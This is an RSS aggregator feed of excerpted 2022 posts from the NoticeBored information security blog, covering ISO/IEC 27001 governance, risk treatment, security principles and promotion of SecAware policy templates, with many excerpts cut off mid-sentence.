www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It's a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
2024-05-05T20:34:58+00:00 www.secnews.physaphae.fr

NoticeBored - Experienced IT Security professional
This blog has been renamed
https://secawareblog.blogspot.com/ Unless you intended to drop out, please update your blogrolls, blog trackers, bookmarks or whatever.
2022-11-13T17:50:02+00:00 http://blog.noticebored.com/2022/11/this-blog-has-been-renamed.html www.secnews.physaphae.fr/article.php?IdArticle=7986209 False None None None

NoticeBored - Experienced IT Security professional
Control is ...
... technical, physical, procedural, legal, social, mechanical, economic, political ...
... applied to processes, systems, machines, people, quality ...
... a volume knob that goes all the way to 11 ...
... automated, semi-automated or manual ...
... an illusion induced by acquiescence ...
... preventive, detective or corrective ...
... avoiding or preventing badness ...
... defining and applying rules ...
... what happens in the tower ...
... an availability challenge ...
... an engineering solution ...
... local, remote or hybrid ...
... hitting the sweet spot ...
... keeping within limits ...
... about mitigating risk ...
... a means to an end ...
... binary or analogue ...
... providing direction ...
... setting boundaries ...
... negative feedback ...
... power superiority ...
... being in charge ...
... being resilient ...
... an impression ...
... management
2022-08-15T14:00:00+00:00 http://blog.noticebored.com/2022/08/control-is.html www.secnews.physaphae.fr/article.php?IdArticle=6330826 False None None None

NoticeBored - Experienced IT Security professional
The business case for security strategy and architecture
The business benefits of developing an information security strategy and accompanying security architecture/design include:
Being proactive, taking the lead in this area - more puppeteer than puppet;
Designing a framework or structure to support the organisation's unique situation and needs;
Positioning and guiding the management of information risk and security within other aspects of the organisation's architecture/design e.g. its IT and information architecture (showing information flows, networked systems, databases, services etc.), complementing and supporting various other business strategies and architectures such as cloud first, artificial intelligence, IIoT, big data, new products, new markets ...);
Providing a blueprint, mapping-out and clarifying the organisational structure, governance arrangements and accountabilities for information risk and security relative to other parts of the business such as IT, physical security, Risk, legal/compliance, HR, operations, business continuity, knowledge management ...;
Defining a coherent sequence or matrix of strategic initiatives (projects, investments, business and technology changes ...) over the next N years, embedding information risk management ever deeper into the fabric of the organisation and strengthening the information security arrangements in various ways (e.g.
systematically phasing-out and replacing aged/deprecated security technologies while researching, piloting and then adopting new ones such as blockchain and post-quantum crypto);
Driving the development and maturity of the information risk and security management function, covering its priorities, internal structure and external working relationships, governance etc.;
Bringing clarity and direction (focus!), reducing complexity and uncertainty associated with myriad 'other options' that are discounted or put on hold;
Seizing opportunities to align and support various departments, processes, systems, partners, projects/initiatives, budgets, plans etc., finding and exploiting points of common interest, avoiding awkward conflicts and gaps;
Identifying key objectives for information risk and security
2022-08-09T11:26:08+00:00 http://blog.noticebored.com/2022/08/the-business-case-for-security-strategy.html www.secnews.physaphae.fr/article.php?IdArticle=6206656 False Guideline None None

NoticeBored - Experienced IT Security professional
Risk is ...
... when threat exploits vulnerability causing impact ...
... tough to measure, express and control ...
... the product of probability and impact ...
... the gap between theory and practice ...
... the root of pessimism and optimism ...
... the once-in-a-hundred-years event ...
... needing seatbelts and airbags ...
... a hair's breadth from disaster ...
... the possibility of exploitation ...
... mitigated but not eliminated ...
... a factor to be borne in mind ...
... inevitable in the Real World ...
... not going entirely to plan ...
... outcome =/= prediction ...
... rarely good, usually bad ...
... rarely bad, usually good ...
... necessary to get ahead
2022-08-08T14:00:00+00:00 http://blog.noticebored.com/2022/08/risk-is.html www.secnews.physaphae.fr/article.php?IdArticle=6194069 False None None None

NoticeBored - Experienced IT Security professional
CISO workshop slides
A glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady eye this morning.
The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):
2022-08-06T10:46:21+00:00 http://blog.noticebored.com/2022/08/a-glossy-nicely-constructed-and.html www.secnews.physaphae.fr/article.php?IdArticle=6150878 False Malware,Vulnerability,Threat,Patching,Guideline,Medical,Cloud APT 38,APT 19,APT 10,APT 37,Uber,APT 15,Guam,APT 28,APT 34 None

NoticeBored - Experienced IT Security professional
Fragility is ...
... the arch-enemy - not the polar opposite - of resilience ...
... a natural consequence of complexity and dependence ...
... when threat meets vulnerability exceeding control ...
... not knowing whether, how and when it will break ...
... being unable/unwilling/afraid to rely on it ...
... untrustworthy, inadequate controls ...
... pushing too far, too fast, too hard ...
... exceeding the breaking strain ...
... passing the point of no return ...
... an engineering challenge ...
... inevitable at some point ...
... hanging on by a thread ...
... often revealed too late ...
... a propensity to failure ...
... being on a knife-edge ...
... going over the brink ...
... obvious in hindsight ...
... being a snowflake ...
... a smashed mirror ...
... beyond the pale ...
... a broken vase ...
... a cracked egg ...
... a step too far ...
... uncertainty ...
... snap!
2022-08-01T14:00:00+00:00 http://blog.noticebored.com/2022/08/fragility-is.html www.secnews.physaphae.fr/article.php?IdArticle=6069757 False Vulnerability,Threat None 2.0000000000000000

NoticeBored - Experienced IT Security professional
Webserver problem problem
2022-08-01T07:08:45+00:00 http://blog.noticebored.com/2022/08/webserver-problem-problem.html www.secnews.physaphae.fr/article.php?IdArticle=6064213 False None None None

NoticeBored - Experienced IT Security professional
Half-a-dozen learning points from a '27001 certification announcement
This morning I bumped into a marketing/promotional piece announcing PageProof's certified "compliance" (conformity!) with "ISO 27001" (ISO/IEC 27001!). Naturally, they take the opportunity to mention that information security is an integral part of their products. The promo contrasts SOC2 against '27001 certification, explaining why they chose '27001 to gain some specific advantages such as GDPR compliance - and fair enough. In the US, compliance is A Big Thing. I get that. It occurs to me, though, that there are other, broader advantages to '27001 which the promo could also have mentioned, further valuable benefits of their newly-certified ISMS.
I spot at least six general learning points here for organisations currently implementing ISO/IEC 27001:
Elaborating on the broad business benefits of '27001 can be a creative and valuable activity in its own right. A well-designed and effective ISMS can achieve way more than protecting the confidentiality, integrity and availability of data, or satisfying GDPR and other compliance obligations. Although PageProof hints at some, it's unclear whether they truly appreciate its full potential but chose not to mention them in this promo.
The eventual marketing/promotional value of '27001 certification is worth thinking-through. From the audience's perspective i.e.
the organisation's third party stakeholders (particularly customers and prospects, plus partners, owners, regulators and other authorities), what worthwhile differences can they expect as a result of the certification? What are the main points that will truly resonate? How will successful certification be promoted, and how will it change the organisation's ongoing marketing, promotional and advertising activities - plus its operations (in order to satisfy if not exceed the market's expectations)? Rhetorical questions such as these may be raised and discussed at any point, ideally starting early-on in the ISMS design and implementation project, and gradually refined in the run-up to certification.
Likewise, what about the internal corporate stakeholders - the managers, staff, contractors, consultants, interns etc.: how will the ISMS implementation project affect the workforce? What changes can they expect? What practical differences will the ISMS make? How can they get involved and help the process along (or at least avoid inadvertently causing problems)? What are the key messages to be put across through internal communications at all stages of the project?
Combining points 1-3 can help clarify the objectives of the ISMS - not just the detailed information risk and security objectives but more generally the business objectives, the rationale for doing all this stuff. What are the anticipated payoffs? Which of those be
2022-07-26T10:03:09+00:00 http://blog.noticebored.com/2022/07/half-dozen-learning-points-from-27001.html www.secnews.physaphae.fr/article.php?IdArticle=5944094 False None None None

NoticeBored - Experienced IT Security professional
Resilience is ...
... depending on others and being there for them when they need us most ...
... the rod bending alarmingly ... while landing a whopper ...
... an oak tree growing roots against the prevailing wind ...
... taking the punches, reeling but not out for the count ...
... demonstrating, time after time, personal integrity ...
... willingness to seize opportunities, taking chances ...
... coping with social distancing, masks and all that ...
... accumulating reserves for the bad times ahead ...
... the bloody-minded determination to press on ...
... disregarding trivia, focusing on what matters ...
... a society for whom this piece resonates ...
... deep resolve founded on inner strength ...
... knowing it'll work out alright in the end ...
... a word, a rich concept, a way of life ...
... knowing when and how to concede ...
... more than 'putting on a brave face' ...
... a prerequisite for ultimate success ...
... facing up to adversity: bring it on ...
... self-belief and trust in the team
2022-07-25T08:51:16+00:00 http://blog.noticebored.com/2022/07/resilience-is.html www.secnews.physaphae.fr/article.php?IdArticle=5928738 False None None None

NoticeBored - Experienced IT Security professional
Risk management trumps checklist security
2022-07-24T16:21:47+00:00 http://blog.noticebored.com/2022/07/risk-management-trumps-checklist.html www.secnews.physaphae.fr/article.php?IdArticle=5915454 False None None None

NoticeBored - Experienced IT Security professional
Security in software development
Prompted by some valuable customer feedback earlier this week, I've been thinking about how best to update the SecAware policy template on software/systems development. The customer is apparently seeking guidance on integrating infosec into the development process, which begs the question "Which development process?". These days, we're spoilt for choice with quite a variety of methods and approaches. Reducing the problem to its fundamentals, there is a desire to end up with software/systems that are 'adequately secure', meaning no unacceptable information risks remain.
That implies having systematically identified and evaluated the information risks at some earlier point, and treated them appropriately - but how?
The traditional waterfall development method works sequentially from business analysis and requirements definition, through design and development, to testing and release - often many months later. Systems security ought to be an integral part of the requirements up-front, and I appreciate from experience just how hard it is to retro-fit security into a waterfall project that has been running for more than a few days or weeks without security involvement.
A significant issue with waterfall is that things can change substantially in the course of development: the organisation hopefully ends up with the system it originally planned, but that may no longer be the system it needs. If the planned security controls turn out to be inadequate in practice, too bad: the next release or version may be months or years away, if ever (assuming the same waterfall approach is used for maintenance, which is not necessarily so*). The quality of the security specification and design (which drives the security design, development and testing) depends on the identification and evaluation of information risks in advance, predicting threats, vulnerabilities and impacts likely to be of concern at the point of delivery some time hence.
In contrast, lean, agile or rapid application development methods cycle through smaller iterations more quickly, presenting more opportunities to update security ... but also more chances to break security due to the hectic pace of change. A key problem is to keep everyone focused on security throughout the process, ensuring that whatever else is going on, sufficient attention is paid to the security aspects. Rapid decision-making is part of the challenge here. It's not just the method that needs to be agile!
DevOps and scrum approaches use feedback from users on each mini-release to inform the ongoing development.
Hopefully security is part of that feedback loop so that it improves incrementally at the same time, but 'hopefully' is a massive clue: if users and managers are not sufficiently security-aware to push for improvements or resist degradat
2022-07-22T17:10:27+00:00 http://blog.noticebored.com/2022/07/security-in-software-development.html www.secnews.physaphae.fr/article.php?IdArticle=5871325 False Guideline None None

NoticeBored - Experienced IT Security professional
ISO management systems assurance
In the context of the ISO management systems standards, the internal audit process and accredited certification systems as a whole are assurance controls primarily intended to confirm that organisations' management systems conform to the explicit requirements formally expressed in the respective ISO standards.
A conformant management system, in turn, is expected to manage (design, direct, control, monitor, maintain …) something: for ISO/IEC 27001, that 'something-being-managed' is the suite of information security controls and other means of addressing the organisation's information risks (called 'information security risks' or 'cybersecurity risks' in the standards). For ISO 9001, it is the quality assurance activities designed to ensure that the organisation's products (goods and services) are fit for purpose. For ISO 14001, it is the controls and activities necessary to minimise environmental damage.
My point is that the somethings-being-managed are conceptually distinct from the 'management systems' through which managers exert their direction and control.
This is a fundamental part of the ISO management systems approach, allowing ISO to specify systems required to manage a wide variety of somethings in a similar way - a governance approach in fact.
Management system certification auditors, whose sole purpose is to audit clients' management systems' conformity with the requirements expressed in the standards, have only a passing interest in those somethings-being-managed, essentially checking that they are indeed being actively managed through the management system, thereby proving that the management system is in fact operational and not just a nice neat set of policies and procedures on paper.
Management system internal auditors, in contrast, may be given a wider brief by management which may include probing further into the somethings being managed ... but that's down to management's decision about the scope and purpose of the internal audits, not a formal requirement of the standards. Management may just as easily decide to have the internal auditors stick to the management system standard conformity aspects, just the same as the certification auditors.
2022-07-21T19:13:52+00:00 http://blog.noticebored.com/2022/07/iso-management-systems-assurance.html www.secnews.physaphae.fr/article.php?IdArticle=5850532 False None None None

NoticeBored - Experienced IT Security professional
Skyscraper of cards
Having put it off for far too long, I'm belatedly trying to catch up with some standards work in the area of Root of Trust, which for me meant starting with the basics, studying simple introductory articles about RoT.
As far as I can tell so far, RoT is a concept - the logical basis, the foundation on which secure IT systems are built.
'Secure IT systems' covers a huge range. At the high end are those used for national security and defence purposes, plus safety- and business-critical systems facing enormous risks (substantial threats and impacts).
At the low end are systems where the threats are mostly accidental and the impacts negligible - perhaps mildly annoying. Not being able to tell precisely how many steps you've taken today, or being unable to read this blog, is hardly going to stop the Earth spinning on its axis. In fact 'mildly' may be overstating it.
'Systems' may be servers, desktops, portables and wearables, plus IoT things and all manner of embedded devices - such as the computers in any modern car or plane controlling the engine, fuel, comms, passenger entertainment, navigation and more, or the smart controller for a pacemaker. Trust me, you don't want your emotionally disturbed ex-partner gaining anonymous remote control of your brakes, altimeter or pacemaker.
In terms of the layers, we the people using IT are tottering precariously on the top of a house of cards. We interact with application software, interacting with the operating system and, via drivers and microcode, the underlying hardware. A 'secure system' is a load of software running on a bunch of hardware, where the software has been designed to distrust the users and administrators, other software and the hardware, all the way down to, typically, a Hardware Security Module, Trusted Platform Module or similar dedicated security device, subsystem or chip. Ironically in relation to RoT, distrust is the default, particularly for the lower layers unless/until they have been authenticated - but there's the rub: towards the bottom of the stack, how can low-level software be sure it is interacting with and authenticating the anticipated security hardware if all it can do is send and receive signals or messages? Likewise, how can the module be sure it is interacting with the appropriate low-level software? What prevents a naughty bit of software acting as a middleman between the two, faking the expected commands and manipulating the responses in order to subvert the authentication controls?
What prevents a nerdy hacker connecting logic and scope probes to the module's ports in order to monitor and maybe inject signals - or just noise to see how well the system copes? How about a we
2022-07-18T16:45:38+00:00 http://blog.noticebored.com/2022/07/skyscraper-of-cards.html www.secnews.physaphae.fr/article.php?IdArticle=5812291 False None None None

NoticeBored - Experienced IT Security professional
Complexity, simplified
Online Safety Bill. It is written in extreme legalese, peppered with strange terms defined in excruciating detail, and littered with internal and external cross-references, hardly any of which are hyperlinked e.g.
2022-07-10T13:41:08+00:00 http://blog.noticebored.com/2022/07/complexity-simplified.html www.secnews.physaphae.fr/article.php?IdArticle=5638390 False Guideline APT 10 None

NoticeBored - Experienced IT Security professional
The discomfort zone
Compliance is a concern that pops up repeatedly on the ISO27k Forum, just this morning for instance. Intrigued by ISO 27001 Annex A control A.18.1.1 "Identification of applicable legislation and contractual requirements", members generally ask what laws are relevant to the ISMS. That's a tough one to answer for two reasons.
Firstly, I'm not a lawyer so I am unqualified and unable to offer legal advice. To be honest, I'm barely familiar with the laws and regs in the UK/EU and NZ, having lived and worked here for long enough to absorb a little knowledge. The best I can offer is a layman's perspective. I feel more confident about the underlying generic principles of risk, compliance, conformity, obligations, accountabilities, assurance and controls though, and have the breadth of work and life experience to appreciate the next point ...
Secondly, there is a huge range of laws and regs that have some relevance to information risk, security, management and the ISMS.
The mind map is a brief glimpse of the landscape, as I see it ...
That's a heady mix of laws and regs that apply to the organisation, its officers and workers, its property and finances, its technologies, its contracts, agreements and relationships with employees and third parties including the authorities, owners, suppliers, partners, prospects and customers, and society at large. There are obligations relating to how it is structured, operated, governed, managed and controlled, plus all manner of internal rules voluntarily adopted by management for business reasons (some of which concern obligations under applicable laws and regs). Noncompliance and nonconformity open the can-o-worms still wider with obligations and expectations about 'awareness', 'due process', 'proof' and more, much more.
That A.18.1.1 control is - how shall I put it - idealistic:
"All relevant legislative statutory, regulatory, contractual requirements and the organization's approach to meet these requirements shall be explicitly identified, documented and kept up to date for each information system and the organization."
All requirements?! Oh boy! Explicit! Documented! Maintained! This is bewildering, scary stuff, especially for relatively inexperienced infosec or cybersecurity professionals who seldom set foot outside of the IT domain. We're definitely in the
2022-07-05T11:41:40+00:00 http://blog.noticebored.com/2022/07/the-discomfort-zone.html www.secnews.physaphae.fr/article.php?IdArticle=5555746 False Guideline None None

NoticeBored - Experienced IT Security professional
Standards development - a tough, risky business
News emerged during June of likely further delays to the publication of the third edition of ISO/IEC 27001, this time due to the need to re-align the main body clauses with ISO's revised management systems template. The planned release in October is in some doubt.
Although we already have considerable discretion over which information security controls are being managed within our ISO/IEC 27001 Information Security Management Systems today, an unfortunate side-effect of standardisation, harmonisation, adoption, accreditation and certification is substantial inertia in the system as a whole. It's a significant issue for our field where the threats, vulnerabilities, impacts and controls are constantly shifting and often moving rapidly ahead of us … but to be honest it's equally problematic for other emerging and fast-moving fields. Infosec is hardly special in this regard. Just look at what's happening in microelectronics, IT, telecomms, robotics, environmental protection and globalisation generally for examples. One possible route out of the tar-pit we've unfortunately slid into is to develop forward-thinking 'future-proof' standards and release them sooner, before things mature, but that's a risky approach given uncertainties ahead. It would not be good for ill-conceived/premature standards to drive markets and users in inappropriate directions. It's also tough for such a large, ponderous, conservative committee as ISO/IEC JTC 1/SC 27. However, the smart city privacy standard ISO/IEC TS 27570 is a shining beacon of light, with promising signs for the developing security standards on Artificial Intelligence and big data security too. I wish I could say the same of 'cyber', cloud and IoT security but (IMNSHO) the committee is struggling to keep pace with these fields, despite some fabulous inputs and proactive support from members plus the likes of the Cloud Security Alliance and NIST.  
The floggings will continue until morale improves.
Another tar-pit escape plan involves speeding-up the standards development process, perhaps also the promotion, accreditation and certification processes that follow each standard's publication – but again there are risks in moving ahead too fast, compromising the quality and value of the standards, damaging ISO/IEC's established brands.
2022-07-02T12:23:41+00:00 http://blog.noticebored.com/2022/07/standards-development-tough-risky.html www.secnews.physaphae.fr/article.php?IdArticle=5501958 False Guideline None None

NoticeBored - Experienced IT Security professional
Shout, shout, let it all out
Here's an insightful and enjoyable way to explore your psyche and vent a little tension at the end of a tough month.
First, find yourself a private space to watch Tears for Fears.
Now shout, shout, let it all out: what are the things you could do without? Come on, I'm talking to you, come on.
Grab a scrap of paper and start writing down the things you could do without. You'll find yourself stimulated by your own words to think of other things, other stuff you don't want, don't like, can't stand, even hate. Fine, scribble away.
How's it going? How do you feel now - vented? Released? If it all gets too much, take a break. Set your list aside to ferment for a while - as long as it takes. There's no rush. You're the boss. If you are so inclined, come back later to tidy up your list and make sense of it. How you do that is up to you. For me, it's mind-mapping, grouping things together, drawing links and doodling. I'll show you mine - well an uncontroversial snippet anyway ...
When you're ready, fully vented, destroy that bit of paper. Let it go, or maybe rip it up and start again.
2022-07-01T13:00:00+00:00 http://blog.noticebored.com/2022/07/shout-shout-let-it-all-out.html www.secnews.physaphae.fr/article.php?IdArticle=5479651 False None None None

NoticeBored - Experienced IT Security professional
What are "information assets"?
Control 5.9 in ISO/IEC 27002:2022 recommends an inventory of information assets that should be “accurate, up to date, consistent and aligned with other inventories”. Fair enough, but what are 'information assets'? What, exactly, are we supposed to be inventorying? The standard refers repeatedly but enigmatically to "information and other associated assets" that an organisation's Information Security Management System protects. The intended meaning of 'information asset' has been a bone of contention within ISO/IEC JTC 1/SC 27 for years, some experts and national bodies vehemently disagreeing with each other until, eventually, a fragile ceasefire was declared in order to move forward on the numerous standards projects that hinge on the term. Currently, '27002 provides a rather broad and unhelpful definition of "asset" as "anything that has value to the organisation" - paperclips, for instance, fall within the definition. Does that mean your ISMS should protect paperclips since, arguably, they are 'associated with information', albeit very low value assets? I know this is reductio ad absurdum but it illustrates the tar pit that SC 27 found itself in.
On a more pragmatic note, I have consciously taken a wide view of information assets in preparing a checklist of information assets for SecAware. I intend to set you thinking about the potential scope, purpose and focal points of your ISMS. You may feel that certain items on the checklist are irrelevant ... or the checklist might just open your eyes to entire categories of valuable information that you hadn't even considered. Whether they end up in or out of scope of your ISMS is for you and your management colleagues to determine. I'm simply giving you food for thought.
2022-06-30T16:35:04+00:00 http://blog.noticebored.com/2022/06/what-are-information-assets.html www.secnews.physaphae.fr/article.php?IdArticle=5464305 False None None None

NoticeBored - Experienced IT Security professional
Authorised exemptions
ISO27k Forum yesterday morning, I wrote and published a simple 2-page exemptions policy template for SecAware. In essence, after explaining what 'exemptions' are, the policy requires that they are authorised after due consideration by management, specifically the relevant Information Owners. Exemption decisions should also be recorded, hinting at a process and some sort of exemptions log. I'm wondering now whether to write a procedure as well, including a basic log template as a starting point. I'm also contemplating writing something on accountability and responsibility, and perhaps generic incident management and post incident review procedures to accompany the incident management policy.
2022-06-30T13:02:25+00:00 http://blog.noticebored.com/2022/06/authorised-exemptions.html www.secnews.physaphae.fr/article.php?IdArticle=5461798 False None None None

NoticeBored - Experienced IT Security professional
The business context for information risk and security
ISO/IEC 27001 is so succinct that it leaves readers perplexed as to what 'context' even means. It stops short of explaining how to determine and make use of various 'internal and external issues' in an Information Security Management System. So, to help clients, I wrote and released a pragmatic 5-page management guideline on this for the SecAware ISMS toolkit, expanding on this neat little summary diagram: With about a thousand words of explanation and pragmatic advice, the guideline has roughly ten times as many words as clauses 4.1 and 4.2 ... or twenty times if you accept that the picture is worth a thousand words.
It was written independently of, and complements, ISO/IEC 27003's advice in this area.
Although I am happy with the SecAware ISMS toolkit materials as they are, I'm always looking for improvement opportunities, ways to add more value for clients. I'm currently working on, or at least thinking about:
A set of fundamental information risk and security principles;
A guideline on the Risk Treatment Plan and Statement of Applicability;
Something on security engineering.
2022-06-28T08:29:13+00:00 http://blog.noticebored.com/2022/06/the-business-context-for-information.html www.secnews.physaphae.fr/article.php?IdArticle=5422140 False None None None

NoticeBored - Experienced IT Security professional
The sadly neglected Risk Treatment Plan
For some curious reason, the Statement of Applicability steals the limelight in the ISO27k world, despite being little more than a formality. Having recently blogged about the dreaded SoA, 'nuff said on that.
Today I'm picking up on the SoA's shy little brother, the Risk Treatment Plan. There's a lot to say and think about here, so coffee-up, settle-down, sit forward and zone-in.
ISO/IEC 27001 barely even acknowledges the RTP.
Here are the first two mentions, tucked discreetly under clause 6.1.3:
2022-06-24T13:40:08+00:00 http://blog.noticebored.com/2022/06/the-sadly-neglected-risk-treatment-plan.html www.secnews.physaphae.fr/article.php?IdArticle=5350915 False Threat,Guideline APT 19,APT 10 4.0000000000000000

NoticeBored - Experienced IT Security professional
Infosec principles (Hinson tips)
Thinking about the principles underpinning information risk and security, here's a tidy little stack of "Hinson tips" - one-liners to set the old brain cells working this chilly mid-Winter morning:
Address information confidentiality, integrity and availability, broadly
Address internal and external threats, both deliberate and accidental/natural
Celebrate security wins: they are rare and valuable
Complete security is unattainable, an oxymoron
Complexity is the arch-enemy of security: the devil's in the details
Consider all stakeholders - users, administrators, maintainers and attackers
Consider threats, vulnerabilities and impacts
Controls modify or maintain risk
Defence-in-depth layers complementary controls of different types
Don't trust anything untrustworthy
Ensure business continuity through resilience, recovery and contingency
Even barely sufficient security is a business-enabler
Excessive security is a business-impediment, more likely to be bypassed
Exploiting information can be a good or a bad thing, depending on context
Failure is a possibility, so fail-safe means fail-secure
Focus on significant risks and the associated key controls
General-purpose controls such as oversight and awareness bolster the rest
Given practical limits to attainable security, residual risks are inevitable
Good security isn't costly: it's valuable, good for business
Identify, evaluate and treat risks systematically
Information content is a valuable yet vulnerable asset
Lack of control is neither threat nor vulnerability
Offensive security is a viable approach, within reason
People can be our greatest threats and our most valuable allies
Reducing exposure reduces risk
Residual (e.g. accepted, shared or unidentified) risks ar
2022-06-22T09:36:12+00:00 http://blog.noticebored.com/2022/06/infosec-principles-hinson-tips.html www.secnews.physaphae.fr/article.php?IdArticle=5314595 False Threat None None

NoticeBored - Experienced IT Security professional
WANTED: a set of infosec principles we can all agree on
SecAware corporate information security policy template incorporates a set of generic principles for information risk and security such as "Our Information Security Management System conforms to generally accepted good security practices as described in the ISO/IEC 27000-series information security standards." and "Information is a valuable business asset that must be protected against inappropriate activities or harm, yet exploited appropriately for the benefit of the organization." Despite being reasonably happy with the 7 principles I selected, I would prefer to base the policy on a generally-accepted set of infosec principles, akin to the OECD Privacy Principles first published with remarkable foresight way back in 1980.
There are in fact several different sets of principles Out There, often incomplete and imprecisely stated. Different authors take different perspectives, emphasizing different aspects, and the contexts and purposes also differ. It will be an 'interesting' challenge for ISO/IEC JTC 1/SC 27 to tease out, elaborate on, fine-tune and hopefully reach consensus on a reasonably succinct, coherent, comprehensive set of generally-applicable 'concepts and principles' for the next edition of ISO/IEC 27000. I just hope the learned committee doesn't end up specifying a racehorse looking something like this ...
[2022-06-21T11:28:45+00:00] http://blog.noticebored.com/2022/06/wanted-set-of-infosec-principles-we-can.html

The Matrix, policy edition

security policy templates and ISO27k ISMS materials.

The main change was to distinguish conformity from compliance - two similar terms that I admit I had been using loosely and often incorrectly for far too long. As I now understand them:
- Compliance refers to fulfilling binding (mandatory) legal, regulatory and contractual obligations;
- Conformity concerns fulfilling optional (discretionary) requirements in standards, agreements, codes of ethics etc.

It's a fine distinction with implications for the associated information risks, given differing impacts:
- Noncompliance may lead to legal enforcement action (fines/penalties), other costly sanctions (such as more intrusive monitoring by the authorities and perhaps revocation of operating licenses) and business issues (such as reputational damage and brand devaluation, plus the costs of defending legal action).
- The consequences of nonconformity may be trivial or nothing at all if nobody even cares, but can also involve business issues such as inefficiencies, excess costs and so on, particularly if customers, business partners, the authorities or other stakeholders are seriously concerned at management's apparent disregard for good security practices.

Certification of an organisation's ISMS, then, demonstrates its conformity with, not compliance to, ISO/IEC 27001 - well in most cases anyway, where management voluntarily chooses to adopt and conform to the standard. If they are obliged by some mandatory, legally-binding requirement (an applicable law or regulation, or perhaps terms in a formal contract with a supplier or customer), I guess they must comply. Putting that another way, nonconformity is an option.
Noncompliance isn't.

Anyway, having adjusted the terminology and tweaked the SecAware materials, I took the opportunity to prepare two new 'bulk deal' packages - a comprehensive suite of information security policy templates, and a full set of ISO27k ISMS materials. I'm hoping to persuade customers to invest a little more for greater returns. The SecAware policies, for instance, are explicitly designed to work best as a whole, an integrated and coherent suite as opposed to an eclectic collection of policies on various discrete topics. In recent years, I have developed a spreadsheet to track the mesh of relationships between policies:

[2022-06-19T09:54:39+00:00] http://blog.noticebored.com/2022/06/the-matrix-policy-edition.html

ISO/IEC 27400 IoT security and privacy standard published

To celebrate the publication of ISO/IEC 27400:2022 today, we have slashed the price for our IoT security policy templates to just $10 each through SecAware.com.

IoT policy is the first of the basic security controls shown on the 'risk-control spectrum' diagram above, and is Control-01 in the new standard ...

Do you have a security policy on IoT? If not, does that mean IoT is out of control in your organisation? Even if you do, what does it say? Is it valid, appropriate, worthwhile, sufficient? The spectrum diagram shows quite a variety of risks and controls, but it is merely a summary, selected highlights. Attempting to cover them all in a policy document would be counterproductive - in fact, general employees can barely cope with a much-simplified one-page 'acceptable use policy'.
The new ISO/IEC 27400 standard takes a broad perspective with copious advice on information security and privacy for the designers, manufacturers, purchasers, users and administrators of IoT things.

[2022-06-14T11:09:22+00:00] http://blog.noticebored.com/2022/06/isoiec-27400-iot-security-and-privacy.html

Third edition of ISO/IEC 27001 coming

An ISO/IEC JTC 1/SC 27 meeting last night was informed that the planned amendment to ISO/IEC 27001:2013 is to be absorbed into a new third edition of the standard to become ISO/IEC 27001:2022.

Apparently, the new 2022 version of '27001 will have minor editorial corrections in the main body text (including one of the two corrigenda published previously), a small but valuable clarification to the notes on subclause 6.1.3, and a complete replacement for Annex A reflecting ISO/IEC 27002:2022.

The transition arrangements are still uncertain but this is my understanding:
- Nobody will be able to use ISO/IEC 27001:2022 formally until it is published, hopefully on October 1st;
- The International Accreditation Forum will publish a mandate for the national accreditation bodies (such as IANZ here in New Zealand) at the same time, with details of the 3 year transition period:
  - Accreditation and certification bodies will be required to update their processes, and train and prepare auditors for accreditation and certification against the new standard within a year of its release;
  - Organisations may wish to be certified against the new standard as soon as the certification bodies are ready to do so, or may (continue to) use the old standard for up to three years beyond its release, meaning a full certification cycle;
- Already (right now), organisations are free to declare any or all of the controls in ISO/IEC 27001:2013 Annex A inapplicable in their Statement of Applicability, instead opting to use an appropriate selection of controls e.g. from ISO/IEC 27002:2022, NIST SP800-50, NIST CSF, ISF, COBIT, CSA, GDPR, PCI-DSS and whatever other sources they like (including entirely custom control sets) in accordance with the current ISO/IEC 27001:2013 clause 6.1.3 note 2, which says in part "The control objectives and controls listed in Annex A are not exhaustive and additional control objectives and controls may be needed."

Regardless of where the controls come from, organisations must:

[2022-06-08T16:28:55+00:00] http://blog.noticebored.com/2022/06/third-edition-of-isoiec-27001-coming.html

The dreaded Statement of Applicability

Subclause 6.1.3 of ISO/IEC 27001:2013 requires compliant organisations to define and apply an information security risk treatment process to:

a) select appropriate information security risk treatment options, taking account of the risk assessment results;

The 'risk treatment options' (including the information security controls) must be 'appropriate' and must 'take account of' (clearly relate to) the 'risk assessment results'. The organisation cannot adopt a generic suite of information security controls simply on the basis that they have been recommended or suggested by someone - not even if they are noted in Annex A.

b) determine all controls that are necessary to implement the information security risk treatment option(s) chosen;
NOTE Organizations can design controls as required, or identify them from any source.

This requirement clearly specifies the need to determine all the controls that the organisation deems necessary to mitigate unacceptable information risks.
Note, however, that it doesn't actually demand they are fully implemented: see point d) below.

c) compare the controls determined in 6.1.3 b) above with those in Annex A and verify that no necessary controls have been omitted;
NOTE 1 Annex A contains a comprehensive list of control objectives and controls. Users of this International Standard are directed to Annex A to ensure that no necessary controls are overlooked.
NOTE 2 Control objectives are implicitly included in the controls chosen. The control objectives and controls listed in Annex A are not exhaustive and additional control objectives and cont

[2022-06-06T10:06:44+00:00] http://blog.noticebored.com/2022/06/the-dreaded-statement-of-applicability.html

Algo-rhythmic infosec

An article by the 50-year-old University of York Department of Computer Science outlines algorithmic approaches in Artificial Intelligence. Here are the highlights:
- Linear sequence: progresses directly through a series of tasks/statements, one after the other.
- Conditional: decides between courses of action according to the conditions set (e.g. if X is 10 then do Y, otherwise do Z).
- Loop: sequential statements are repeated.
- Brute force: tries approaches systematically, blocking off dead ends to leave only viable routes to get closer to a solution.
- Recursive: apply the learning from a series of small episodes to larger problems of the same type.
- Backtracking: incrementally builds a data set of all possible solutions, retracing or undoing/reversing its last step if unsuccessful in order to pursue other pathways until a satisfactory result is reached.
- Greedy: quickly goes to the most obvious solution (low-hanging fruit) and stops.
- Dynamic programming: outcomes of prior runs (solved sub-problems) inform new approaches.
- Divide and conquer: divides the problem into smaller parts, then consolidates the solutions into an overall result.
- Supervised learning: programmers train the system using structured data, indicating the correct answers. The system learns to recognise patterns and hence deduce the correct results itself when fed new data.
